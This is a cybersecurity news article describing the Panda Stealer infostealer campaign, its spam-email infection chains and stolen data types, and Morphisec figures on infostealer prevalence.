A new information theft is tracking cryptocurrency wallets and credentials for applications like NordVPN, Telegram, Discord and Steam.
Panda Stealer uses spam email and the same elusive fileless distribution method used by a Phobos ransomware campaign recently discovered by Morphisec.
The attack campaign appears to be aimed primarily at users in Australia, Germany, Japan, and the United States.
Panda Stealer was discovered by Trend Micro in early April. Threat researchers have identified two chains of infection used by the campaign.
They said, “In one, there is an .XLSM attachment containing macros that download a loader. Then the loader downloads and runs the main stealer.
“The other chain of infection has an attached .XLS file with an Excel formula that uses a PowerShell command to access paste.ee, a Pastebin alternative that accesses a second encrypted PowerShell command.”
Once installed, Panda Stealer can collect details such as private keys and records of past transactions from its victim’s various digital wallets, including Dash, Bytecoin, Litecoin and Ethereum.
Other advantages of Panda are the ability to take screenshots of the infected computer and extract data from browsers such as cookies, passwords and cards.
The researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said the server assigned to that address has been blocked.
Panda Stealer was identified as a variant of Collector Stealer that was cracked by the Russian threat actor NCP, also known as su1c1de.
“Because the cracked Collector Stealer-Builder is openly available online, cybercriminals and script kiddies alike can use it to create their own customized version of the stealer and C&C panel,” researchers noted.
Although the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.
CTO Michael Gorelik, who heads Morphisec’s threat intelligence team, has seen the number of info dealers skyrocket since the Emotet network was disrupted.
Analyzing the various types of attacks Morphisec detected on seven million corporate endpoints over the past 12 months, Gorelik found that Infostealers accounted for the highest percentage of attempted endpoint attacks (31%).